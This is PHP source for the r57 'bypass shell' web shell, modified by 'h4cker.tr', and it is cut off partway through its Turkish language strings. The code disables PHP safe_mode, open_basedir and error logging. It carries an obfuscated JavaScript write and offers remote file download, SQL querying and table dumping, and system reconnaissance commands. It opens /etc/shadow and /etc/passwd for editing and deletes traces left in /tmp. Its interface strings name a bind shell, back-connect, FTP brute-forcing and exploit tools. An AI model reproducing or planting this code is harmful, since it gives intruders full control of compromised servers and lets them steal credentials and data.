<?php error_reporting(0);
$language = 'tr';
$auth = 0;
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);;
echo '';
if ((!@function_exists('ini_get')) || (@ini_get('open_basedir') != NULL) || (@ini_get('safe_mode_include_dir') != NULL)) {
$open_basedir = 1;
} else {
$open_basedir = 0;
};
define("starttime", @getmicrotime());
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
$safe_mode = @ini_get('safe_mode');
$version = '1.43<br> edited by h4cker.tr';
if (@version_compare(@phpversion(), '4.1.0') == - 1) {
$_POST = & $HTTP_POST_VARS;
$_GET = & $HTTP_GET_VARS;
$_SERVER = & $HTTP_SERVER_VARS;
$_COOKIE = & $HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc()) {
foreach ($_POST as $k => $v) {
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k => $v) {
$_COOKIE[$k] = stripslashes($v);
}
}
if ($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER']) !== $name || md5($_SERVER['PHP_AUTH_PW']) !== $pass) {
header('WWW-Authenticate: Basic realm="HELLO!"');
header('HTTP/1.0 401 Unauthorized');
exit("<b>Access Denied</b>");
}
}
$head = '
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>r57 bypass shell | modified by h4cker.tr</title>
<script type="text/javascript" language="javascript">
<!--
ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
OT="";
for(j=0;j<MI.length;j++){
OT+=ML.charAt(MI.charCodeAt(j)-48);
}document.write(OT);
// --></script>
<STYLE>
tr {
BORDER-RIGHT: black 1px solid;
BORDER-TOP: black 1px solid;
BORDER-LEFT: black 1px solid;
BORDER-BOTTOM: black 1px solid;
BORDER-COLOR: black;
color: silver;
}
td {
BORDER-RIGHT: black 1px solid;
BORDER-TOP: black 1px solid;
BORDER-LEFT: black 1px solid;
BORDER-BOTTOM: black 1px solid;
BORDER-COLOR: black;
background-color:black;
color: white;
}
.table1 {
BORDER: 0px;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: black;
color: white;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
BACKGROUND-COLOR: black;
color: green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #50AA20;
}
table {
BORDER: #eeeeee 1px outset;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #131313;
color: #50AA20;
}
input {
border : solid 1px;
border-color : #2D2D2D #252525 #252525 #252525;
BACKGROUND-COLOR: black;
font: 8pt Verdana;
color: red;
}
select {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #131313;
font: 8pt Verdana;
color: white;;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: #131313;
width: 30%;
color: white;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: black;
font: Fixedsys bold;
color: silver;
}
BODY {
SCROLLBAR-ARROW-COLOR: #444444;
SCROLLBAR-BASE-COLOR: #444444;
1px;
color: #50AA20;
background-color: #131313;
}
.main {
margin : -287px 0px 0px -490px;
border : #000000 solid 1px;
BORDER-COLOR: #333333;
}
.tt {
background-color: black;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
class zipfile {
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0) {
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr.= "\x14\x00";
$fr.= "\x00\x00";
$fr.= "\x08\x00";
$fr.= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr.= pack('V', $crc);
$fr.= pack('V', $c_len);
$fr.= pack('V', $unc_len);
$fr.= pack('v', strlen($name));
$fr.= pack('v', 0);
$fr.= $name;
$fr.= $zdata;
$this->datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec.= "\x00\x00";
$cdrec.= "\x14\x00";
$cdrec.= "\x00\x00";
$cdrec.= "\x08\x00";
$cdrec.= $hexdtime;
$cdrec.= pack('V', $crc);
$cdrec.= pack('V', $c_len);
$cdrec.= pack('V', $unc_len);
$cdrec.= pack('v', strlen($name));
$cdrec.= pack('v', 0);
$cdrec.= pack('v', 0);
$cdrec.= pack('v', 0);
$cdrec.= pack('v', 0);
$cdrec.= pack('V', 32);
$cdrec.= pack('V', $this->old_offset);
$this->old_offset+= strlen($fr);
$cdrec.= $name;
$this->ctrl_dir[] = $cdrec;
}
function file() {
$data = implode('', $this->datasec);
$ctrldir = implode('', $this->ctrl_dir);
return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
}
}
function compress(&$filename, &$filedump, $compress) {
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress')) {
$filename.= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
} else if ($compress == 'gzip' && @function_exists('gzencode')) {
$filename.= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
} else if ($compress == 'zip' && @function_exists('gzcompress')) {
$filename.= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile->addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile->file();
} else {
$mime_type = 'application/octet-stream';
}
}
function moreread($temp) {
global $lang, $language;
$str = '';
if (@function_exists('fopen') && @function_exists('feof') && @function_exists('fgets') && @function_exists('fclose')) {
$ffile = @fopen($temp, "r");
while (!@feof($ffile)) {
$str.= @fgets($ffile);
}
fclose($ffile);
} elseif (@function_exists('fopen') && @function_exists('fread') && @function_exists('fclose') && @function_exists('filesize')) {
$ffile = @fopen($temp, "r");
$str = @fread($ffile, @filesize($temp));
@fclose($ffile);
} elseif (@function_exists('file')) {
$ffiles = @file($temp);
foreach ($ffiles as $ffile) {
$str.= $ffile;
}
} elseif (@function_exists('file_get_contents')) {
$str = @file_get_contents($temp);
} elseif (@function_exists('readfile')) {
$str = @readfile($temp);
} else {
echo $lang[$language . '_text56'];
}
return $str;
}
function readzlib($filename, $temp = '') {
global $lang, $language;
$str = '';
if (!$temp) {
$temp = tempnam(@getcwd(), "copytemp");
};
if (@copy("compress.zlib://" . $filename, $temp)) {
$str = moreread($temp);
} else echo $lang[$language . '_text119'];
@unlink($temp);
return $str;
}
function mailattach($to, $from, $subj, $attach) {
$headers = "From: $from\r\n";
$headers.= "MIME-Version: 1.0\r\n";
$headers.= "Content-Type: " . $attach['type'];
$headers.= "; name=\"" . $attach['name'] . "\"\r\n";
$headers.= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers.= chunk_split(base64_encode($attach['content'])) . "\r\n";
if (mail($to, $subj, "", $headers)) {
return 1;
}
return 0;
}
class my_sql {
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;
function connect() {
switch ($this->db) {
case 'MySQL':
if (empty($this->port)) {
$this->port = '3306';
}
if (!@function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host . ':' . $this->port, $this->user, $this->pass);
if (is_resource($this->connection)) return 1;
break;
case 'MSSQL':
if (empty($this->port)) {
$this->port = '1433';
}
if (!@function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host . ',' . $this->port, $this->user, $this->pass);
if ($this->connection) return 1;
break;
case 'PostgreSQL':
if (empty($this->port)) {
$this->port = '5432';
}
$str = "host='" . $this->host . "' port='" . $this->port . "' user='" . $this->user . "' password='" . $this->pass . "' dbname='" . $this->base . "'";
if (!@function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if (is_resource($this->connection)) return 1;
break;
case 'Oracle':
if (!@function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if (is_resource($this->connection)) return 1;
break;
}
return 0;
}
function select_db() {
switch ($this->db) {
case 'MySQL':
if (@mysql_select_db($this->base, $this->connection)) return 1;
break;
case 'MSSQL':
if (@mssql_select_db($this->base, $this->connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
}
return 0;
}
function query($query) {
$this->res = $this->error = '';
switch ($this->db) {
case 'MySQL':
if (false === ($this->res = @mysql_query('/*' . chr(0) . '*/' . $query, $this->connection))) {
$this->error = @mysql_error($this->connection);
return 0;
} else if (is_resource($this->res)) {
return 1;
}
return 2;
break;
case 'MSSQL':
if (false === ($this->res = @mssql_query($query, $this->connection))) {
$this->error = 'Query error';
return 0;
} else if (@mssql_num_rows($this->res) > 0) {
return 1;
}
return 2;
break;
case 'PostgreSQL':
if (false === ($this->res = @pg_query($this->connection, $query))) {
$this->error = @pg_last_error($this->connection);
return 0;
} else if (@pg_num_rows($this->res) > 0) {
return 1;
}
return 2;
break;
case 'Oracle':
if (false === ($this->res = @ociparse($this->connection, $query))) {
$this->error = 'Query parse error';
} else {
if (@ociexecute($this->res)) {
if (@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error = $error['message'];
}
break;
}
return 0;
}
function get_result() {
$this->rows = array();
$this->columns = array();
$this->num_rows = $this->num_fields = 0;
switch ($this->db) {
case 'MySQL':
$this->num_rows = @mysql_num_rows($this->res);
$this->num_fields = @mysql_num_fields($this->res);
while (false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if ($this->num_rows) {
$this->columns = @array_keys($this->rows[0]);
return 1;
}
break;
case 'MSSQL':
$this->num_rows = @mssql_num_rows($this->res);
$this->num_fields = @mssql_num_fields($this->res);
while (false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if ($this->num_rows) {
$this->columns = @array_keys($this->rows[0]);
return 1;
};
break;
case 'PostgreSQL':
$this->num_rows = @pg_num_rows($this->res);
$this->num_fields = @pg_num_fields($this->res);
while (false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if ($this->num_rows) {
$this->columns = @array_keys($this->rows[0]);
return 1;
}
break;
case 'Oracle':
$this->num_fields = @ocinumcols($this->res);
while (false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
@ocifreestatement($this->res);
if ($this->num_rows) {
$this->columns = @array_keys($this->rows[0]);
return 1;
}
break;
}
return 0;
}
function dump($table) {
if (empty($table)) return 0;
$this->dump = array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: ' . date("d/m/Y H:i:s");
$this->dump[3] = '## Database: ' . $this->base;
$this->dump[4] = '## Table: ' . $table;
$this->dump[5] = '## --------------------------------------- ';
switch ($this->db) {
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if ($this->query('/*' . chr(0) . '*/ SHOW CREATE TABLE `' . $table . '`') != 1) return 0;
if (!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if ($this->query('/*' . chr(0) . '*/ SELECT * FROM `' . $table . '`') != 1) return 0;
if (!$this->get_result()) return 0;
for ($i = 0;$i < $this->num_rows;$i++) {
foreach ($this->rows[$i] as $k => $v) {
$this->rows[$i][$k] = @mysql_real_escape_string($v);
}
$this->dump[] = 'INSERT INTO `' . $table . '` (`' . @implode("`, `", $this->columns) . '`) VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if ($this->query('SELECT * FROM ' . $table) != 1) return 0;
if (!$this->get_result()) return 0;
for ($i = 0;$i < $this->num_rows;$i++) {
foreach ($this->rows[$i] as $k => $v) {
$this->rows[$i][$k] = @addslashes($v);
}
$this->dump[] = 'INSERT INTO ' . $table . ' (' . @implode(", ", $this->columns) . ') VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if ($this->query('SELECT * FROM ' . $table) != 1) return 0;
if (!$this->get_result()) return 0;
for ($i = 0;$i < $this->num_rows;$i++) {
foreach ($this->rows[$i] as $k => $v) {
$this->rows[$i][$k] = @addslashes($v);
}
$this->dump[] = 'INSERT INTO ' . $table . ' (' . @implode(", ", $this->columns) . ') VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
$this->dump[] = '## under construction';
break;
default:
return 0;
break;
}
return 1;
}
function close() {
switch ($this->db) {
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
}
}
function affected_rows() {
switch ($this->db) {
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
default:
return 0;
break;
}
}
}
if (!empty($_POST['cmd']) && $_POST['cmd'] == "download_file" && !empty($_POST['d_name'])) {
if ($file = @fopen($_POST['d_name'], "r")) {
$filedump = @fread($file, @filesize($_POST['d_name']));
@fclose($file);
} else if ($file = readzlib($_POST['d_name'])) {
$filedump = $file;
} else {
err(1, $_POST['d_name']);
$_POST['cmd'] = "";
}
if (isset($_POST['cmd'])) {
@ob_clean();
$filename = @basename($_POST['d_name']);
$content_encoding = $mime_type = '';
compress($filename, $filedump, $_POST['compress']);
if (!empty($content_encoding)) {
header('Content-Encoding: ' . $content_encoding);
}
header("Content-type: " . $mime_type);
header("Content-disposition: attachment; filename=\"" . $filename . "\";");
echo $filedump;
exit();
}
}
if (isset($_GET['phpinfo'])) {
echo @phpinfo();
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=''PHP_SELF'] . ">BACK</a> ]</b></font></div>";
die();
}
if (!empty($_POST['cmd']) && $_POST['cmd'] == "db_query") {
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';', $_POST['db_query']);
echo '<body bgcolor=#000000>';
if (!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
else {
if (!empty($sql->base) && !$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
else {
foreach ($querys as $num => $query) {
if (strlen($query) > 5) {
echo "<font face=Verdana size=-2 color=green><b>Query#" . $num . " : " . htmlspecialchars($query, ENT_QUOTES) . "</b></font><br>";
switch ($sql->query($query)) {
case '0':
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>" . $sql->error . "</b></font></td></tr></table>";
break;
case '1':
if ($sql->get_result()) {
echo "<table width=100%>";
foreach ($sql->columns as $k => $v) $sql->columns[$k] = htmlspecialchars($v, ENT_QUOTES);
$keys = @implode(" </b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b> ", $sql->columns);
echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b> " . $keys . " </b></font></td></tr>";
for ($i = 0;$i < $sql->num_rows;$i++) {
foreach ($sql->rows[$i] as $k => $v) $sql->rows[$i][$k] = htmlspecialchars($v, ENT_QUOTES);
$values = @implode(" </font></td><td><font face=Verdana size=-2> ", $sql->rows[$i]);
echo '<tr><td><font face=Verdana size=-2> ' . $values . ' </font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows() ? ($sql->affected_rows()) : ('0');
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>" . $ar . "</b></font></td></tr></table><br>";
break;
}
}
}
}
}
echo "<br><form name=form method=POST>";
echo in('hidden', 'db', 0, $_POST['db']);
echo in('hidden', 'db_server', 0, $_POST['db_server']);
echo in('hidden', 'db_port', 0, $_POST['db_port']);
echo in('hidden', 'mysql_l', 0, $_POST['mysql_l']);
echo in('hidden', 'mysql_p', 0, $_POST['mysql_p']);
echo in('hidden', 'mysql_db', 0, $_POST['mysql_db']);
echo in('hidden', 'cmd', 0, 'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"" . $sql->base . "\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>" . (!empty($_POST['db_query']) ? ($_POST['db_query']) : ("SHOW DATABASES;\nSELECT * FROM user;")) . "</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=''PHP_SELF'] . ">BACK</a> ]</b></font></div>";
die();
}
if (isset($_GET['delete'])) {
@unlink('index.php');
}
if (isset($_GET['tmp'])) {
@unlink("/tmp/bdpl");
@unlink("/tmp/back");
@unlink("/tmp/bd");
@unlink("/tmp/bd.c");
@unlink("/tmp/dp");
@unlink("/tmp/dpc");
@unlink("/tmp/dpc.c");
@unlink("/tmp/prxpl");
@unlink("/tmp/grep.txt");
}
if (isset($_GET['phpini'])) {
echo $head;
function U_value($value) {
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array)$value;
if (@is_array($value)) {
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string)$value);
}
function U_wordwrap($str) {
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
}
if (@function_exists('ini_get_all')) {
$r = '';
echo '<table width=100%>', '<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
foreach (@ini_get_all() as $key => $value) {
$r.= '<tr><td>' . ws(3) . '<font face=Verdana size=-2><b>' . $key . '</b></font></td><td><font face=Verdana size=-2><div align=center><b>' . U_value($value['local_value']) . '</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>' . U_value($value['global_value']) . '</b></div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=''PHP_SELF'] . ">BACK</a> ]</b></font></div>";
die();
}
if (isset($_GET['cpu'])) {
echo $head;
echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
$cpuf = @file("cpuinfo");
if ($cpuf) {
$c = @sizeof($cpuf);
for ($i = 0;$i < $c;$i++) {
$info = @explode(":", $cpuf[$i]);
if ($info[1] == "") {
$info[1] = "---";
}
$r.= '<tr><td>' . ws(3) . '<font face=Verdana size=-2><b>' . trim($info[0]) . '</b></font></td><td><font face=Verdana size=-2><div align=center><b>' . trim($info[1]) . '</b></div></font></td></tr>';
}
echo $r;
} else {
echo '<tr><td>' . ws(3) . '<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=''PHP_SELF'] . ">BACK</a> ]</b></font></div>";
die();
}
if (isset($_GET['mem'])) {
echo $head;
echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
$memf = @file("meminfo");
if ($memf) {
$c = sizeof($memf);
for ($i = 0;$i < $c;$i++) {
$info = explode(":", $memf[$i]);
if ($info[1] == "") {
$info[1] = "---";
}
$r.= '<tr><td>' . ws(3) . '<font face=Verdana size=-2><b>' . trim($info[0]) . '</b></font></td><td><font face=Verdana size=-2><div align=center><b>' . trim($info[1]) . '</b></div></font></td></tr>';
}
echo $r;
} else {
echo '<tr><td>' . ws(3) . '<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=''PHP_SELF'] . ">green</a> ]</b></font></div>";
die();
}
if (isset($_GET['dmesg(8)'])) {
$_POST['cmd'] = 'dmesg(8)';
}
if (isset($_GET['free'])) {
$_POST['cmd'] = 'free';
}
if (isset($_GET['vmstat'])) {
$_POST['cmd'] = 'vmstat';
}
if (isset($_GET['lspci'])) {
$_POST['cmd'] = 'lspci';
}
if (isset($_GET['lsdev'])) {
$_POST['cmd'] = 'lsdev';
}
if (isset($_GET['procinfo'])) {
$_POST['cmd'] = 'cat /proc/cpuinfo';
}
if (isset($_GET['version'])) {
$_POST['cmd'] = 'cat /proc/version';
}
if (isset($_GET['interrupts'])) {
$_POST['cmd'] = 'cat /proc/interrupts';
}
if (isset($_GET['realise1'])) {
$_POST['cmd'] = 'cat /etc/*realise';
}
if (isset($_GET['service'])) {
$_POST['cmd'] = 'service --status-all';
}
if (isset($_GET['ifconfig'])) {
$_POST['cmd'] = 'ifconfig';
}
if (isset($_GET['w'])) {
$_POST['cmd'] = 'w';
}
if (isset($_GET['who'])) {
$_POST['cmd'] = 'who';
}
if (isset($_GET['uptime'])) {
$_POST['cmd'] = 'uptime';
}
if (isset($_GET['last'])) {
$_POST['cmd'] = 'last -n 10';
}
if (isset($_GET['psaux'])) {
$_POST['cmd'] = 'ps -aux';
}
if (isset($_GET['netstat'])) {
$_POST['cmd'] = 'netstat -a';
}
if (isset($_GET['lsattr'])) {
$_POST['cmd'] = 'lsattr -va';
}
if (isset($_GET['syslog'])) {
$_POST['cmd'] = 'edit_file';
$_POST['e_name'] = '/etc/syslog.conf';
}
if (isset($_GET['fstab'])) {
$_POST['cmd'] = 'edit_file';
$_POST['e_name'] = '/etc/fstab';
}
if (isset($_GET['fdisk'])) {
$_POST['cmd'] = 'fdisk -l';
}
if (isset($_GET['df'])) {
$_POST['cmd'] = 'df -h';
}
if (isset($_GET['realise2'])) {
$_POST['cmd'] = 'edit_file';
$_POST['e_name'] = '/etc/issue.net';
}
if (isset($_GET['hosts'])) {
$_POST['cmd'] = 'edit_file';
$_POST['e_name'] = '/etc/hosts';
}
if (isset($_GET['resolv'])) {
$_POST['cmd'] = 'edit_file';
$_POST['e_name'] = '/etc/resolv.conf';
}
if (isset($_GET['systeminfo'])) {
$_POST['cmd'] = 'systeminfo';
}
if (isset($_GET['shadow'])) {
$_POST['cmd'] = 'edit_file';
$_POST['e_name'] = '/etc/shadow';
}
if (isset($_GET['passwd'])) {
$_POST['cmd'] = 'edit_file';
$_POST['e_name'] = '/etc/passwd';
}
$lang = array('tr_text1' => 'Komut Uygula', 'tr_text2' => 'Server uzerinde komut calistir ', 'tr_text3' => 'Komut istemi ', 'tr_text4' => 'Calisma Dizini ', 'tr_text5' => 'Servere Dosya Upload Et', 'tr_text6' => 'Yerel Dosya ', 'tr_text7' => 'Dizin Veya Dosya Bul ', 'tr_text8' => 'Sec', 'tr_butt1' => 'Uygula', 'tr_butt2' => 'Yukle', 'tr_text9' => 'Porta baglan /bin/bash', 'tr_text10' => 'Port', 'tr_text11' => 'Sifre Giris', 'tr_butt3' => 'Baglan', 'tr_text12' => 'Back-Connect', 'tr_text13' => 'IP', 'tr_text14' => 'Port', 'tr_butt4' => 'Baglan', 'tr_text15' => 'Uzaktan servere dosya yukle', 'tr_text16' => 'ile', 'tr_text17' => 'Uzak Dosya', 'tr_text18' => 'Yerel Dosya', 'tr_text19' => 'Exploits', 'tr_text20' => 'Kullan', 'tr_text21' => ' Yeni ad', 'tr_text22' => 'datapipe', 'tr_text23' => 'Yerel Port', 'tr_text24' => 'Uzak Host', 'tr_text25' => 'Uzak Port', 'tr_text26' => 'Kullan', 'tr_butt5' => 'Iste', 'tr_text28' => 'Guvenlik Modunda Calis', 'tr_text29' => 'Giris Yok ', 'tr_butt6' => 'Degistir', 'tr_text30' => 'Cat file', 'tr_butt7' => 'Goster', 'tr_text31' => 'Dosya Bulunamadi', 'tr_text32' => 'PHP Kod Degerlendir ', 'tr_text33' => 'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', 'tr_butt8' => 'Testet', 'tr_text34' => 'Includes fonksiyonu ile Guvenlik modunu atlamayi test et.', 'tr_text35' => 'Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et.', 'tr_text36' => 'Database[VeriTabani]', 'tr_text37' => 'Kullanici', 'tr_text38' => 'Sifre', 'tr_text39' => 'Tablo', 'tr_text40' => 'Dump database table[DB Tablosu dok]', 'tr_butt9' => 'Dump', 'tr_text41' => 'DB dosyalarini kaydet.[Dump filed]', 'tr_text42' => 'Dosya Duzenle ', 'tr_text43' => 'Dosya Duzenlemek icin', 'tr_butt10' => 'Kaydet', 'tr_text44' => 'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor', 'tr_text45' => 'Dosya Kaydedildi', 'tr_text46' => 'PHP info Goster()', 'tr_text47' => 'Php.ini dosyasinda ki degiskenleri goster', 'tr_text48' => 'Temp dosylarini sil', 'tr_butt11' => 'Dosya Duzenle', 'tr_text49' => 'Server dan bu scripti sil', 'tr_text50' => 'CPU bilgisini incele', 'tr_text51' => 'Memory[hafiza] bilgisini incele]', 'tr_text52' => 'Metni Bul ', 'tr_text53' => 'Klasor Bul', 'tr_text54' => 'Dosyalarda ki Metni Bul', 'tr_butt12' => 'Bul', 'tr_text55' => 'Dosya Bul ', 'tr_text56' => 'Bulunmadi :( KeyCoder :)', 'tr_text57' => 'Olustur/Sil Dosya/Dizin ', 'tr_text58' => 'isim', 'tr_text59' => 'Dosya', 'tr_text60' => 'Dizin', 'tr_butt13' => 'Olustur/Sil', 'tr_text61' => 'Dosya Olustur', 'tr_text62' => 'Dizin Olustur', 'tr_text63' => 'Dosya Sil', 'tr_text64' => 'Dizin Sil', 'tr_text65' => 'Olustur', 'tr_text66' => 'Sil', 'tr_text67' => 'Chown/Chgrp/Chmod', 'tr_text68' => 'Uygula', 'tr_text69' => 'param1', 'tr_text70' => 'param2', 'tr_text71' => "Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", 'tr_text72' => 'Metin Bul', 'tr_text73' => 'Klasor Bul', 'tr_text74' => 'Dosya Bul', 'tr_text75' => '* you can use regexp', 'tr_text76' => 'Metin Ara Dosyalarin icinde Arama Yoluyla', 'tr_text80' => 'Cesit', 'tr_text81' => 'Net', 'tr_text82' => 'Databases', 'tr_text83' => 'SQL Sorgusu Yap', 'tr_text84' => 'SQL Sorgusu', 'tr_text85' => 'Test bypass safe_mode with commands execute via MSSQL server', 'tr_text86' => 'Download files from server', 'tr_butt14' => 'Download', 'tr_text87' => 'Download files from remote ftp-server', 'tr_text88' => 'server:port', 'tr_text89' => 'File on ftp', 'tr_text90' => 'Transfer mode', 'tr_text91' => 'Archivation', 'tr_text92' => 'without arch.', 'tr_text93' => 'FTP', 'tr_text94' => 'FTP-bruteforce', 'tr_text95' => 'Users list', 'tr_text96' => 'Can\'t get users list', 'tr_text97' => 'checked: ', 'tr_text98' => 'success: ', 'tr_text99' => '/etc/passwd', 'tr_text100' => 'Send file to remote ftp server', 'tr_text101' => 'Use reverse (user -> resu)', 'tr_text102' => 'Mail', 